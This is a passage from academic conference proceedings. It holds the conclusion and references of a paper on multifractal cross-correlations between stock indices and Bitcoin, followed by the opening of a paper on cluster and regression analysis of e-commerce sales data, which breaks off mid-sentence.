500-HSI. Our analysis of the DCCA correlation coefficient across different time scales demonstrates that the cross-correlations between stock indices and BTC are presented to be weak in the short term (less than 100 days), but tend to increase for a long-term period. For the pair HSI-BTC, cross-correlations are presented to be weak even for s < 600 days. Since then, the cross-correlation coefficient ρDCCA > 0.3. As is expected for the stock market, both S&P 500 and HSI demonstrate a high degree of correlation across many time scales. Using the sliding approach, we can track across time how the non-linear dynamics of two systems change dependently on each other.
332
A. Bielinskyi et al.
Fig. 4. The DCCA cross-correlation coefficient ρDCCA (s) versus time scale s for the pairs: S&P 500-BTC (a), HSI-BTC (b), and S&P 500-HSI (c)
The Analysis of Multifractal Cross-Correlation Connectedness
333
Figure 5 presents the comparative dynamics of coefficient ρDCCA along with S&P 500 and HSI calculated for pairs S&P 500-BTC, HSI-BTC, and S&P 500-HSI. Noticeable long-term correlation can be observed for the periods since 2018. For the crisis, because of the coronavirus pandemic, this correlation is also observed. By the end of 2021, both mid and long-term cross-correlation coefficients were decreasing and their dynamics started to demonstrate an upward trend. Figure 6 demonstrates the performance of the cross-correlation Hurst exponent calculated for S&P 500-BTC, HSI-BTC, and S&P 500-HSI. The cross-correlation Hurst exponent decreased during the most noticeable crashes in stock markets. The same we can see for the upward trend in stocks. Therefore, most of the time BTC behaved asymmetrically. Also, for HSI and S&P 500 anti-persistent behavior during critical phenomena of both indices is noticeable. The dynamics of α calculated for each pair is presented in Fig. 7. The width of multifractality remains a reliable indicator for critical phenomena of all indices. All of the figures demonstrate an increase in the width of multifractality during crash phenomena. Especially that is noticeable during the COVID-19 crisis. However, the degree of multifractality decreased for 2021, where visually BTC had noticeable drops in price. This period in the BTC market will require further research. In Fig. 8 we can see how all of the presented singularity exponents behave. In this case, their dynamics demonstrates behavior similar to α. At the same time, we can observe that the dynamics of αmin indicator do not represent synchronous behavior along with other singularity exponents. For pair S&P 500-BTC it becomes higher for last days, indicating a growth of multifractality. This will require additional research, but the signal of this indicator may appear to be false. Figure 9, where both L and R measures are presented, gives us an idea of how dominance of small and large fluctuations varies. The growth of L is the most noticeable during crash events such as coronavirus pandemic, whereas R starts to increase for small critical events. It is worth noting that for the pair S&P 500-HSI, the distribution of large and small fluctuations seems relatively uniform. The dynamics of both indicators represent prospects for building effective trading strategies (Fig. 10). The long tail type S indicator shows us how the difference between left and right tails changes. Here we expect that with the crisis event, the indicator will decrease, which will correspond to the dominance of the left tail, i.e., multifractal properties of large events in the studied signal. Figure 11 presents the dynamics of asymmetry coefficient A for all of the studied pairs. Its growth is noticeable during the largest drops in the studied period. At the beginning for the pair S&P 500-BTC some of signals generated by A seem to be spurious as the correlation between them could be negative. For other pairs, most of the time, our indicator behaves in an expectable way (Fig. 12). The height of f (α) demonstrates dynamics similar to S. In this case we expect higher probability of occurring large fluctuations as f decreases, and for small fluctuation we expect opposite behavior. This indicator is also presented to perspective alternative for building reliable trading strategies.
334
A. Bielinskyi et al.
Fig. 5. The comparative dynamics of S&P 500, HSI along with mid-term and long-term DCCA cross-correlation coefficients calculated for the pairs: S&P 500-BTC (a), HSI-BTC (b), and S&P 500-HSI (c)
The Analysis of Multifractal Cross-Correlation Connectedness
335
Fig. 6. The comparative dynamics of S&P 500, HSI, and hxy calculated for the pairs: S&P 500BTC (a), HSI-BTC (b), and S&P 500-HSI (c)
336
A. Bielinskyi et al.
Fig. 7. The comparative dynamics of S&P 500, HSI, and α calculated for the pairs: S&P 500BTC (a), HSI-BTC (b), and S&P 500-HSI (c)
The Analysis of Multifractal Cross-Correlation Connectedness
337
Fig. 8. The comparative dynamics of S&P 500, HSI, and α0 , αmin , αmean , αmax measures calculated for the pairs: S&P 500-BTC (a), HSI-BTC (b), and S&P 500-HSI (c)
338
A. Bielinskyi et al.
Fig. 9. The comparative dynamics of S&P 500, HSI, and L, R measures calculated for the pairs: S&P 500-BTC (a), HSI-BTC (b), and S&P 500-HSI (c)
The Analysis of Multifractal Cross-Correlation Connectedness
339
Fig. 10. The comparative dynamics of S&P 500, HSI, and S measure calculated for the pairs: S&P 500-BTC (a), HSI-BTC (b), and S&P 500-HSI (c)
340
A. Bielinskyi et al.
Fig. 11. The comparative dynamics of S&P 500, HSI, and A measure calculated for the pairs: S&P 500-BTC (a), HSI-BTC (b), and S&P 500-HSI (c)
The Analysis of Multifractal Cross-Correlation Connectedness
341
Fig. 12. The comparative dynamics of S&P 500, HSI, and f measure calculated for the pairs: S&P 500-BTC (a), HSI-BTC (b), and S&P 500-HSI (c)
342
A. Bielinskyi et al.
4 Discussion and Conclusions In this study, we have analyzed multifractal cross-correlation characteristics of stock and cryptocurrency markets using multifractal detrended cross-correlation analysis. Using the MF-DCCA and sliding windows approach, we have constructed indicators of cross-correlated behavior in S&P 500, HSI, and BTC. The combination of both approaches gives us the possibility to present such measures as the DCCA correlation coefficient ρDCCA for short- and long-term behavior, the generalized cross-correlation Hurst exponent (hxy ), the width of multifractal spectrum α, the singularity exponents α0 , αmin , αmean , αmax , the widths of left (L) and right (R) tails of f (α), the long tail type S, the asymmetry coefficient A, and the height of the multifractal spectrum f . In the example of S&P 500, HSI, and BTC we have presented that most of the time the dynamics of stock indices and developing digital market remained anti-persistent during crisis events. Nevertheless, over the last years, their degree of cross-correlations started to demonstrate synchronic behavior. The crashes of both markets are characterized by multifractality, which implies long-term memory for the pair of markets. By analyzing the cross-correlation coefficient ρDCCA versus time scale s, we have confirmed that in short-term cross-correlations between stock and crypto markets are presented to be weak. Even the mid-term cross-correlations between the Chinese market and the crypto market remain insignificant. Both S&P 500 and HSI indices are highly correlated despite some differences in their structure. Most of our indicators show that after the COVID-19 crisis, and the 2022 Russian invasion into Ukraine that has resulted in a collapse of food supply, we may expect a higher degree of interconnection between the stock market and the cryptocurrencies market. Our empirical analysis shows further perspectives for constructing effective algorithmic strategies and forecasting models based on complex systems theory. In the future, it would be interesting to consider other methods of classical multifractal analysis or its cross-correlation modifications in combination with other methods of complex systems theory [3, 4, 26, 29, 30, 42–45, 49]. Acknowledgements. This work is part of the applied research “Monitoring, Forecasting, and Prevention of Crisis Phenomena in Complecx Socio-Economic Systems”, which is funded by the Ministry of Education and Science of Ukraine (projects No. 0122U001694).
References 1. Aysan, A.F., Demir, E., Gozgor, G., Lau, C.K.M.: Effects of the geopolitical risks on Bitcoin returns and volatility. Res. Int. Bus. Financ. 47, 511–518 (2019) 2. Bariviera, A.F., Merediz-Sola, I.: Where do we stand in cryptocurrencies economic research? A survey based on hybrid analysis. J. Econ. Surv. 35, 377–407 (2021) 3. Bielinskyi, A., Semerikov, S., Serdyuk, O., Solovieva, V., Soloviev, V., Pichl, L.: Econophysics of sustainability indices. In: CEUR Workshop Proceedings, vol. 2713, pp. 372–392 (2020) 4. Bielinskyi, A., Soloviev, V.: Complex network precursors of crashes and critical events in the cryptocurrency market. In: CEUR Workshop Proceedings, vol. 2292, pp. 37–45 (2018)
The Analysis of Multifractal Cross-Correlation Connectedness
343
5. Bielinskyi, A.O., Hushko, S.V., Matviychuk, A.V., Serdyuk, O.A., Semerikov, S.O., Soloviev, V.N.: Irreversibility of financial time series: a case of crisis. In: CEUR Workshop Proceedings, vol. 3048, pp. 134–150 (2021) 6. Bielinskyi, A.O., Serdyuk, O.A., Semerikov, S.O., Soloviev, V.N.: Econophysics of cryptocurrency crashes: a systematic review. In: CEUR Workshop Proceedings, vol. 3048, pp. 31–133 (2021) 7. Buszko, M., Orzeszko, W., Stawarz, M.: COVID-19 pandemic and stability of stock market - a sectoral approach. PLoS ONE 16, e0250938 (2021) 8. Chahuán-Jiménez, K., Rubilar, R., de la Fuente-Mella, H., Leiva, V.: Breakpoint analysis for the COVID-19 pandemic and its effect on the stock markets. Entropy 23, 100 (2021) 9. Chen, S.-P., He, L.-Y.: Multifractal spectrum analysis of nonlinear dynamical mechanisms in China’s agricultural futures markets. Phys. A 389, 1434–1444 (2010) 10. Corbet, S., Lucey, B., Urquhart, A., Yarovaya, L.: Cryptocurrencies as a financial asset: a systematic analysis. Int. Rev. Financ. Anal. 62, 182–199 (2019) 11. Dai, M., Hou, J., Ye, D.: Multifractal detrended fluctuation analysis based on fractal fitting: the long-range correlation detection method for highway volume data. Phys. A 444, 722–731 (2016) 12. Dai, M., Zhang, C., Zhang, D.: Multifractal and singularity analysis of highway volume data. Phys. A 407, 332–340 (2014) 13. Dewandaru, G., Masih, R., Bacha, O., Masih, A.M.M.: Developing trading strategies based on fractal finance: an application of MF-DFA in the context of Islamic equities. Phys. A 438, 223–235 (2015) 14. Dro˙zd˙z, S., Kowalski, R., O´swi¸ecimka, P., Rak, R., G¸ebarowski, R.: Dynamical variety of shapes in financial multifractality. Complexity 2018, 13 (2018) 15. Dro˙zd˙z, S., Kwapie´n, J., O´swi˛ecimka, P., Stanisz, T., W˛atorek, M.: Complexity in economic and social systems: cryptocurrency market at around COVID-19. Entropy 22, 1043 (2020) 16. Dro˙zd˙z, S., O´swi¸ecimka, P.: Detecting and interpreting distortions in hierarchical organization of complex time series. Phys. Rev. E. 91, 030902 (2015) 17. Flori, A.: Cryptocurrencies in finance: review and applications. Int. J. Theor. Appl. Financ. 22, 1950020 (2019) 18. Frisch, U., Parisi, G.: On the singularity structure of fully developed turbulence. In: Ghil, M., Benzi, R., Parisi, G. (eds.) Turbulence and Predictability of Geophysical Flows and Climate Dynamics, pp. 84–88. North-Holland, New York (1985) 19. Gerlach, J.-C., Demos, G., Sornette, D.: Dissection of Bitcoin’s multiscale bubble history from January 2012 to February 2018. R. Soc. Open Sci. 6, 180643 (2019) 20. Grassberger, P.: Generalized dimensions of strange attractors. Phys. Lett. A 97, 227–230 (1983) 21. Halsey, T.C., Jensen, M.H., Kadanoff, L.P., Procaccia, I., Shraiman, B.I.: Fractal measures and their singularities: the characterization of strange sets. Phys. Rev. A 33, 1141 (1986) 22. Hurst, H.E.: Long-term storage capacity of reservoirs. Trans. Am. Soc. Civ. Eng. 116, 770–799 (1951) 23. Ihlen, E.A.F.: Introduction to multifractal detrended fluctuation analysis in Matlab. Front. Physiol. 3, 141 (2012) 24. James, N., Menzies, M.: Association between COVID-19 cases and international equity indices. Phys. D 417, 132809 (2021) 25. James, N., Menzies, M.: Efficiency of communities and financial markets during the 2020 pandemic. Chaos 31, 083116 (2021) 26. Jiang, Z.-Q., Zhou, W.-X.: Multifractal detrending moving-average cross-correlation analysis. Phys. Rev. E 84, 016106 (2011)
344
A. Bielinskyi et al.
27. Kantelhardt, J.W., Zschiegner, S.A., Koscienlny-Bunde, E., Bunde, A., Havlin, S., Stanley, H.E.: Multifractal detrended fluctuation analysis of non-stationary time series. Phys. A 316, 87–114 (2002) 28. Katsiampa, P., Yarovaya, L., Zi˛eba, D.: High-frequency connectedness between Bitcoin and other top-traded crypto assets during the COVID-19 crisis. J. Int. Fin. Mark. Inst. Money (2022) 29. Kiv, A.E., et al.: Machine learning for prediction of emergent economy dynamics. In: CEUR Workshop Proceedings, vol. 3048, pp. i–xxxi (2021) 30. Kristoufek, L.: Multifractal height cross-correlation analysis: a new method for analyzing long-range cross-correlations. EPL (Europhys. Lett.) 95, 68001 (2011) 31. Li, J., Lu, X., Zhou, Y.: Cross-correlations between crude oil and exchange markets for selected oil rich economies. Phys. A 453, 131–143 (2016) 32. Lo, A.W.: Long-term memory in stock market prices. Econometrica 59, 1279–1313 (1991) 33. Lu, X., Li, J., Zhou, Y., Qian, Y.: Cross-correlations between RMB exchange rate and international commodity markets. Phys. A 486, 168–182 (2017) 34. Lu, X., Tian, J., Zho, Y., Li, Z.: Multifractal detrended fluctuation analysis of the Chinese stock index futures market. Phys. A 392, 1452–1458 (2013) 35. Ma, F., Wei, Y., Huang, D., Zhao, L.: Cross-correlations between West Texas intermediate crude oil and the stock markets of the BRIC. Phys. A 392, 5356–5368 (2013) 36. Ma, F., Wei, Y., Huang, D.: Multifractal detrended cross-correlation analysis between the Chinese stock market and surrounding stock markets. Phys. A 392, 1659–1670 (2013) 37. Maheu, J.M., McCurdy, T.H., Song, Y.: Bull and bear markets during the COVID-19 pandemic. Fin. Res. Lett. 42, 102091 (2021) 38. Meakin, P.: Fractals, Scaling and Growth far from Equilibrium. Cambridge University Press, Cambridge (1998) 39. O´swi¸ecimka, P., Livi, L., Dro˙zd˙z, S.: Right-side-stretched multifractal spectra indicate smallworldness in networks. Commun. Nonlinear Sci. Numer. Simul. 57, 231–245 (2018) 40. Peng, C.K., Buldyrev, S.V., Havlin, S., Simons, M., Stanley, H.E., Goldberger, A.L.: Mosaic organization of DNA nucleotides. Phys. Rev. E 49, 1685–1689 (1994) 41. Podobnik, B., Stanley, H.E.: Detrended cross-correlation analysis: a new method for analyzing two non-stationary time series. Phys. Rev. Lett. 100, 084102 (2008) 42. Qian, X.-Y., Liu, Y.-M., Jiang, Z.-Q., Podobnik, B., Zhou, W.-X., Stanley, H.E.: Detrended partial cross-correlation analysis of two nonstationary time series influenced by common external forces. Phys. Rev. E 91, 062816 (2015) 43. Soloviev, V., Bielinskyi, A., Serdyuk, O., Solovieva, V., Semerikov, S.: Lyapunov exponents as indicators of the stock market crashes. In: CEUR Workshop Proceedings, vol. 2732, pp. 455– 470 (2020) 44. Soloviev, V., Bielinskyi, A., Solovieva, V.: Entropy analysis of crisis phenomena for DJIA index. In: CEUR Workshop Proceedings, vol. 2393, pp. 434–449 (2019) 45. Soloviev, V.N., Bielinskyi, A.O., Kharadzjan, N.A.: Coverage of the coronavirus pandemic through entropy measures. In: CEUR Workshop Proceedings, vol. 2832, pp. 24–42 (2020) 46. Song, R., Shu, M., Zhu, W.: The 2020 global stock market crash: endogenous or exogenous? Phys. A. 585, 126425 (2022) 47. Sornette, D.: Critical Phenomena in Natural Sciences: Chaos, Fractals, Self-Organization and Disorder. Concepts and Tools. Springer, Heidelberg (2006). https://doi.org/10.1007/3-54033182-4 48. The official page of “Yahoo! Finance” (1997). https://finance.yahoo.com 49. Wang, J., Shang, P., Ge, W.: Multifractal cross-correlation analysis based on statistical moments. Fractals 20, 271–279 (2012) 50. W˛atorek, M., Dro˙zd˙z, S., Kwapie´n, J., Minati, L., O´swi˛ecimka, P., Stanuszek, M.: Multiscale characteristics of the emerging global cryptocurrency market. Phys. Rep. 901, 1–82 (2021)
The Analysis of Multifractal Cross-Correlation Connectedness
345
51. Xia, S., Huiping, C., Ziqin, W., Yongzhuang, Y.: Multifractal analysis of Hang Seng index in Hong Kong stock market. Phys. A 291, 553–562 (2001) 52. Zebende, G.: DCCA cross-correlation coefficient: Quantifying level of cross-correlation. Phys. A 390, 614–618 (2011) 53. Zhang, D., Hu, M., Ji, Q.: Financial markets under the global pandemic of COVID-19. Fin. Res. Lett. 36, 101528 (2020) 54. Zhang, W., Wang, P., Li, X., Shen, D.: Twitter’s daily happiness sentiment and international stock returns: evidence from linear and nonlinear causality tests. J. Behave. Exp. Fin. 18, 50–53 (2018) 55. Zhang, Z., Zhang, Y., Shen, D., Zhang, W.: The dynamic cross-correlations between mass media news, new media news, and stock returns. Complexity 2018, 1–11 (2018) 56. Zhou, W.X.: Multifractal detrended cross-correlation analysis for two nonstationary signals. Phys. Rev. E 77, 066211 (2008) 57. Zou, Y., Donner, R.V., Marwan, N., Donges, J.F., Kurths, J.: Complex network approaches to nonlinear time series analysis. Phys. Rep. 787, 1–97 (2019)
Using Data Science Tools in E-Commerce: Client’s Advertising Campaigns vs. Sales of Enterprise Products Tetiana Zatonatska1 , Tomasz Wołowiec2 , Oleksandr Dluhopolskyi2,3(B) , Oleksandr Podskrebko1 , and Olena Maksymchuk1 1 Taras Shevchenko National University of Kyiv, Kyiv, Ukraine 2 Higher School of Economics and Innovation, Lublin, Poland
[email protected] 3 West Ukrainian National University, Ternopil, Ukraine
Abstract. Quarantine measures to prevent the spread of COVID-19 pandemic has led to a rapid growth of the e-retail market. Online shopping has become commonplace and for some groups of people the only way to provide themselves with the resources. Therefore, due to the excessive accumulation of online data, modern methods of analysis are necessary. Due to a literature overview on the possibilities of using data science tools, such methods and models for processing e-commerce data as data mining (cluster analysis, regression analysis, classification), machine learning, artificial neural networks, visualization and much more have been identified. The purpose of the article is to build a data processing model for improving the efficiency of e-commerce. The authors propose a cluster analysis of online markets that consist of household products of an enterprise. Ward’s methods and cluster visualization have been used during the modeling. The authors determine such methods and models for e-commerce data processing as data mining, machine learning, artificial neural networks. As a result, each cluster is evaluated according to the statistical indicators. Also, options for the development of e-commerce and improvement of marketing strategy are proposed. The use of advertising on social networks is able to significantly increase e-sales, while investing in print media is inefficient. Thus, the using of the built model is effective in improving of sales and planning of marketing costs. The possibilities of using data science tools in e-commerce analysis are a key area for attracting customers, expanding business, and increasing revenue. Keywords: E-commerce · data science · big data · cluster analysis · regression analysis
1 Introduction Due to the pandemic, e-commerce has experienced incredible growth and the arrival of new consumers. Many companies have had to close their outlets and continue to do business only through online platforms. Online shopping has become commonplace and for some groups of society the only way to provide themselves with the resources being safe. © The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 E. Faure et al. (Eds.): ITEST 2022, LNDECT 178, pp. 346–359, 2023. https://doi.org/10.1007/978-3-031-35467-0_22
Using Data Science Tools in E-Commerce
347
Today, there is increasing evidence of significant growth in e-commerce in both the B2C and B2B segments. For example, Amazon’s global sales grew by 26% in the first quarter of 2020 (Amazon, 2020). In the case of the number of online orders in April 2020, the United States and Canada saw an even more impressive increase of almost 2.5 times compared to the spring of 2019 (Forbes, 2020). In the B2C segment, this trend was particularly strong in the markets for medical devices, necessities and household goods, food, electronics, etc. For example, according to a study by Deloitte (Deloitte, 2020), in Denmark, 65% of food companies reported an increase of more than 10% compared to what was expected earlier, while sales of luxury goods and interiors, on the contrary, decreased. According to Statista (Statista, 2021), the size of the global e-commerce retail market in 2020 has reached 4.280 trillion dollars, which is 27% growth compared to 2019, and according to forecasts, the size of the e-commerce market by 2024 will grow rapidly and reach 6.388 trillion dollars USD (Fig. 1). The growth of the e-commerce market in Ukraine under the influence of the pandemic is also intensive. According to the EVO group of companies (E-commerce, 2021), in 2020 the volume of the e-commerce market in Ukraine reached 4.0 billion dollars, which is 8.8% of total retail sales and 41% higher than e-sales in 2019. The active growth of the e-commerce market is accompanied by an increase in the amount of accumulated information using the latest technologies. This, in turn, makes possible to use advanced approaches and data analysis tools to study consumer behavior, business efficiency, optimize costs and adapt them to current trends.
7,000
6,388 5,908
6,000
5,424 4,891
5,000
4,280
4,000
2,982
3,000 2,000
3,354
2,382 1,336
1,548
1,845
1,000 0
2014 2015 2016 2017 2018 2019 2020 2021 2022* 2023* 2024* Fig. 1. Retail e-commerce sales in the world from 2014 to 2024, billion U.S. dollars. Source: own research based on (Statista, 2021)
348
T. Zatonatska et al.
One of such tools is Data Science, which includes methods, processes and systems for obtaining information from structured and unstructured data. Thus, the aim of the study is to identify existing modern methods of Data Science for the analysis of e-commerce data, as well as to develop a model that will help to increase sales of goods on online platforms. According to the goal of the study on building a data processing model for improving the efficiency of e-commerce, the cluster analysis and regression model have been used. All modeling is implemented in the software environment R-Studio.
2 Theoretical Background The active growth of the e-commerce market is accompanied by an increase in the amount of information accumulated through the latest technologies. This, in turn, requires the use of advanced approaches, methods and technological means for their storage, processing and use. The topic of big data is still ambiguous but continues to be actively studied by experts in various fields (economics, information technology, politics, etc.). However, the ability to store data and perform various calculations with it does not give a competitive advantage. Data Science is used as a data analyst to solve various business problems. Unlike the term “big data”, which gained popularity in the 2010s, the concept of “data science” appeared much earlier, namely in the second half of the 20th century. The beginning of this discipline is considered to be 1966, when the Committee on Data of the International Science Council (CODATA) was founded, and the first mention of this concept dates back to 1975 with the publication of the book “Concise Survey of Computer Methods” by P. Naur (Naur, 1975). It defines data science as the discipline of studying the life cycle of digital data – from their creation to processing and use in other fields. However, this term became widely used only in the 1990s, and only in the early 2000s it became generally accepted. Interest in data science increased with the popularization of the concept of Big Data in 2010, when the computing power of even home computers already allowed to work with large amounts of data. Thus, data science is an interdisciplinary field of scientific methods, processes and systems related to obtaining information from structured and unstructured data. Data science is a continuation of such areas of data analysis as statistics, clustering, classification, machine learning, forecasting and others. Data science as a field is a very popular, but still poorly formalized activity. Today, different companies still have different understandings of the terms “data science” and “data scientist”, but they all share a common goal – to use data to gain a competitive advantage. Data scientists use data stored with big data to build analytical, statistical, data mining and machine learning models that can answer the questions: “what happened”, “why did it happen”, “what will happen” and “what’s next to do with it”. Existing research demonstrates that using data science tools can enable a company to reap a number of benefits, such as (Mykhalchuk et al., 2021; Yue, Li, 2018; Kovtoniuk et al., 2021; Zatonatska, Dluhopolskyi, 2019; Panchenko et al., 2021; Dluhopolskyi et al., 2021; Zatonatska et al., 2019; Zatonatska et al., 2021; Zatonatska et al., 2022; Fedirko et al., 2021; Rymarczyk et al., 2021): improving pricing strategies for goods and services; creation of targeted advertising; improving the link between research and
Using Data Science Tools in E-Commerce
349
development of new products; improving customer service; improving the quality of multi-channel integration and coordination; expanding global search sources from multiple business units and locations; achieving greater business efficiency through the creation and implementation of new models. The use of data science methods in e-commerce has been the subject of many studies. Sarah S. Alrumiah & M. Hadwan (Alrumiah, Hadwan, 2021) theoretically investigated the values for suppliers and consumers of the introduction of big data analysis in e-commerce. Authors found that companies used BDA to understand consumer behavior and increase customer loyalty. In addition, the recommendations obtained during the big data analysis personalized the search for purchases for consumers. However, the authors also highlighted the negative consequences of using BDA in e-commerce, such as the dependence of data availability. In addition, the accumulation of data and the implementation of a system of their analysis were costly from a financial point of view. In conclusion, the authors noted that although the BDA is improving e-commerce, rapid data growth is still a challenge today. Sh. Akter & S.F. Wamba (Akter, Wamba, 2016) in their article presented aspects, distinctive characteristics, types, value in business and problems of big data analysis in e-commerce. The article contains extensive discussions on future problems and opportunities in the theory and practice of using Data science. The results of the study synthesize various concepts of using big data analysis, which give a deeper idea of the cross-cutting analytical possibilities of using data science methods on the example of leading companies in the world (such as Amazon, Netflix, Google, etc.). The purpose of empirical research of Y. Cheng, Y. Yang, J. Jiang & G.C. Xu (Cheng et al., 2015) was to solve the problem of evaluating e-commerce sites. Scientists considered data mining as one of the effective methods to solve this problem. During the investigation were used factor analysis and DBSCAN data clustering algorithm to evaluate the performance of 100 sites. Also improved DBSCAN algorithm was presented. As a result, the researchers proposed options for improving the considered input parameters for each cluster of sites (number of users with access to the site, number of site views, number of visits to the site, site speed, site size, etc.). D. Malhotra & O. Rishi (Malhotra, Rishi, 2021) investigated the shortcomings of product search systems in e-commerce and solved the problem of making decisions about online shopping. While modeling, an innovative page ranking algorithm based on HDFS-MapReduce of the second generation, or a relevance vector algorithm (RV), was developed and put into practice. The proposed approach can well satisfy all critical parameters, such as scalability, support for partial failures, extensibility and so on. Extensive experimental evaluation shows the effectiveness and efficiency of the proposed algorithm for ranking RV pages and the IMSS-AE tool compared to other popular search engines.
350
T. Zatonatska et al.
Q. Wang, R. Cai & M. Zhao (Wang et al., 2020) studied the impact of online marketing on brand development using data science methods. Linear regression and reference vector regression (SVM) were used in the simulation. As a result, the proposed model can be used to forecast the financial performance of the enterprise, as well as to improve the effectiveness of brand marketing. Therefore, according to modern investigation about possibilities of using data science tools the authors determined such methods and models for e-commerce data processing as cluster analysis and regression analysis.
3 Research Objective, Methodology and Data The authors developed a model of clustering sites of a household chemicals supplier in the Ukrainian market and built regression model. The task of the model is to identify several clusters and, according to it, to make an evaluation for improving e-sales and marketing strategy. The purpose of the regression analysis model is to verify the relationship between the client’s advertising campaign on Instagram and the dynamics of sales of enterprise products on the client’s site. The client’s page on Instagram publishes news about a wave of discounts on goods of certain brand. The publication contains a link to the website of the online store, where the user can view the entire promotional range and buy it. For implementation the model a data of household enterprise has been used. It consists of e-sale of goods of the enterprise on 72 Internet sites on 9 characteristics during 2020 (Table 1, Appendix A). Table 1. Fragment of descriptive statistics of the studied data set. Source: own evaluation №
Name of site
Income (X1)
Income per month
Marginality (X3)
Visitors (X4)
(X2)
Av. Price per
Conversion (X6)
Complexity (X7)
Units (X8)
Transactions (X9)
unit (X5)
1
allo.ua
223,770
31,967
84
11,152,580
25.85
15
1.7985
8,658
4,814
2
aquamarket.com
361,151
51,593
85
844,240
24.3
16
2.2535
14,862
6,595
3
atbmarket.ua
1,096,617
156,660
85
661,860
39.94
9
1.54
27,456
17,829
71
zacupca.com
633,359
90,480
86
3,802,980
43.45
6
1.3587
14,578
10,729
72
watsons.ua
801,687
114,527
84
3,382,500
37.27
9
1.4058
21,512
15,302
…
Using Data Science Tools in E-Commerce
351
Input characteristics of sites are: X1 – annual income from the sale of goods, thousands of UAH; X2 – average monthly income from sales of goods, thousands of UAH; X3 – margin of sales realized on the site during the period, %; X4 – the number of site visitors during the period; X5 – average unit cost of goods, UAH; X6 – site conversion (number of visitors who purchased products/number of site visitors), %; X7 – the complexity of the check (number of purchased goods/number of transactions in which there is at least 1 unit of goods); X8 – the number of units sold per year, pcs.; X9 – the number of transactions implemented on the site during the period. Two databases were used for the study. The first database contained daily information on the number of visits to the site and subsequent orders for promotional products within a month. The second database contained the following indicators (daily within a month): • number of community followers, pers.; • number of community visitors, pers.; • content diversity – is defined as the ratio of the number of content types to the number of publications per day, %; • audience engagement, or ERday (%) – is determined by the ratio of the sum of all user actions (ex. Comments) per day to the total number of community members; • coverage – the number of users who saw the post; • the day when the publication was made (1 – weekday, 0 – weekends); • number of visits to the online store site.
4 Results Ward’s method was used to aggregate the data, and as predicted by this method, the square of the Euclidean distance was calculated using the R-studio software. After implementing the hierarchical cluster analysis by the Ward method and obtaining a preliminary dendrogram, the authors expert assessment identified 4 clusters of the model k = 4 (Fig. 2) and obtained the characteristics of each cluster. According to the results of cluster analysis, 72 sites were divided into 4 clusters of sites. Authors formed the following conclusions about clusters according to the statistical indicators (Tables 2 and 3): • cluster 1: is the lowest one and has the lowest average complexity of the check (1.39), which indicates the presence of mostly impulse purchases and low interest of visitors to goods of this category or brand. The cluster sites have high prospects and are an opportunity to increase sales; • cluster 2: has the lowest rates of income and margin (83%), as well as the number of transactions and units purchased, but this cluster has the highest rates of conversion and complexity of the check, which indicates the purpose of the range of sites; • cluster 3: sites of this cluster have the highest margin and average unit price, but the lowest conversion rates, which also indicates a low interest of visitors to these sites in the segment of household chemicals;
352
T. Zatonatska et al.
• cluster 4: is the largest one and shows the highest indicators of income, number of transactions and purchased units.
Fig. 2. Dendrogram obtained from hierarchical cluster analysis by the Ward’s method. Source: own research
Table 2. Statistical features of clusters 1 and 2. Source: own research Cluster 1
Cluster 2
mean
median
min
max
mean
median
min
max
Income
397,107
396713
172357
801687
281,230
229,765
118,862
664,340
Income per month
56,730
56673
24622
114,527
40,883
32,824
22,883
94,906
Marginality
85%
86%
74%
87%
83%
83%
78%
86%
Visitors
2,685,668
2,144,880
1,025,660
11,152,580
943,336
839,550
357,660
2,359,240
Av. Price per unit
34
34
25,8
46,9
26.7
25.5
24.1
34.3
Conversion
8%
8%
1%
15%
13%
11%
8%
30%
Complexity
1.39
1.34
1.25
1.8
1.83
1.81
1.55
2.25
Units
11,686
11,679
5,389
211,512
10,456
8,718
4,723
19,359
Transactions
8,430
8,810
3,973
15,302
5,722
4,714
2,576
10,716
Number of sites
8
18
Using Data Science Tools in E-Commerce
353
Table 3. Statistical features of clusters 3 and 4. Source: own research Cluster 3
Cluster 4
mean
median
min
max
mean
median
min
max
Income
916,162
975,483
479,030
1,217,189
1,768,458
1,564,635
1,360,941
2,654,074
Income per month
130,880
139,355
68,433
173,884
252,637
2,233,519
194,420
379,153
Marginality
87%
87%
84%
89%
86%
86%
84%
87%
Visitors
4,397,544
4,072,380
661,860
8,835,300
5,783,028
5,432,060
2,147,780
9,547,520
Av. Price per unit
43
43
35.3
66.3
37.1
36.7
34.7
40.1
Conversion
8%
7%
5%
11%
12%
9%
6%
36%
Complexity
1.41
1.38
1.2
1.75
1.55
1.51
1.39
1.97
Units
21,884
24,349
12,391
31,807
47,956
42,879
34,717
76,398
Transactions
15,483
15,890
9,177
22,648
30,535
28,522
22,802
41,443
Number of sites
15
31
It is important to understand whether there is a relationship between links from a publication link to a website and the number of orders. In the linear regression the dependent variable Y is the number of sales, the independent X is the number of visits to the online store site (Fig. 3). According to model adequacy (R2 = 0.9316, p − value < 0.05) the authors concluded that the degree of dependence of the number of purchases on the number of visits to the online store is very high.
Fig. 3. The result of linear regression. Source: own research
354
T. Zatonatska et al.
If we accept the linear nature of the dependence of the data of two statistical indicators, the coefficient in this regression characterizes the conversion of sales. So, according to the model, the conversion rate of the site is 18.33%. Then, using multiple regression based on 2 databases (Fig. 4), the authors have found out which indicators of the site have the greatest impact on sales. In this model the independent variables are: X1 – audience engagement (ER_day); X2 – content diversity (cont_div); X3 – number of community followers (group_size); X4 – coverage (coverage); X5 – number of community visitors (visitors).
Fig. 4. The result of multiple regression. Source: own research
Using Data Science Tools in E-Commerce
355
5 Discussion Regression analysis has shown that there is no direct relationship between certain characteristics of publications and the customer’s intention to make a purchase. In general, the number of site visitors depends on the client community visitors. We can also take into account the indicator “Group size”, the impact of which is almost insignificant. The built model is unique, as 72 sites with e-commerce proposals were randomly researched and grouped into 4 clusters. 9 criteria were analyzed and proposals for business units of each cluster were formulated. Similar studies by other authors have not been found.
6 Conclusions Thus, due to regression analysis we have formed the following conclusions: using of such a marketing tool as the publication of information about promotional activities on social networks effectively affects the number of e-sales; the kind of publications does not have a direct impact on the number of sales, so spending of financial resources on a variety of publications is not effective. Due to the specifics of each cluster, the authors have made the following recommendations for the enterprise: • cluster 1: placing banners and other marketing tools on sites that will increase the visibility of products; • cluster 2: placing the assortment with higher margin; • cluster 3: increasing the visibility of products (placement of banners, etc.), supported by promotions which will affect the margins but increase the interest of visitors; • cluster 4: according to the best performance among other clusters, it will be enough to support the current concept of selling product. The results and analytical conclusions of modeling will increase the financial performance of the business and improve marketing activities. The study is of practical importance for the market of household goods, as well as for all other types of goods sold on online platforms. This study proves the 